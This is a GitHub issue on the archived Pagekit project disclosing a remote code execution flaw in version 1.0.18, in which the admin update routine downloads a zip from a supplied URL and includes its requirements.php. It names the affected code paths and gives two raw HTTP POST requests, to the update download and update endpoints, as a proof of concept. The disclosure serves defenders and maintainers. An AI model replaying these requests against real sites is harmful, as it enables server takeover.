Skip to content
This repository has been archived by the owner on Dec 1, 2023. It is now read-only.

There is a logical flaw that leads to obtaining shell access. #977

Open
iQingshan opened this issue Aug 20, 2023 · 0 comments
Open

There is a logical flaw that leads to obtaining shell access. #977

iQingshan opened this issue Aug 20, 2023 · 0 comments

Comments

@iQingshan
Copy link

Problem

There is a logical flaw that leads to obtaining shell access.

Technical Details

  • Pagekit version: 1.0.18
  • Webserver: nginx
  • Database: mysql
  • PHP Version: 7.4

Vulnerability Path:
app/installer/src/Controller/UpdateController.php
Lines 32-72: downloadAction and updateAction functions
The downloadAction function retrieves a file from a remote location to the local system.
The updateAction function reads the downloaded file.
Within it, the SelfUpdater function is called at app/installer/src/SelfUpdater.php.
It includes the app/installer/requirements.php file from the remotely fetched file.
This can lead to remote code execution.
Based on this, constructing a zip file as follows:
pagekit.zip

The data package is as follows

POST /index.php/admin/system/update/download HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
Content-Length: 58
Content-Type: application/x-www-form-urlencoded
Cookie: Administrator's Cookie
Host: localhost
Referer: http://localhost/index.php/admin/system/update/download
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36

url=constructed_zip_file&_csrf=4eb8d50f82ebae5b1fa16d5177d99ea7d740a8b2


POST /index.php/admin/system/update/update HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: keep-alive
Content-Length: 46
Content-Type: application/x-www-form-urlencoded
Cookie: Administrator's Cookie
Host: localhost
Referer: http://localhost /index.php/admin/system/update/update
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36

_csrf=4eb8d50f82ebae5b1fa16d5177d99ea7d740a8b2
Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@iQingshan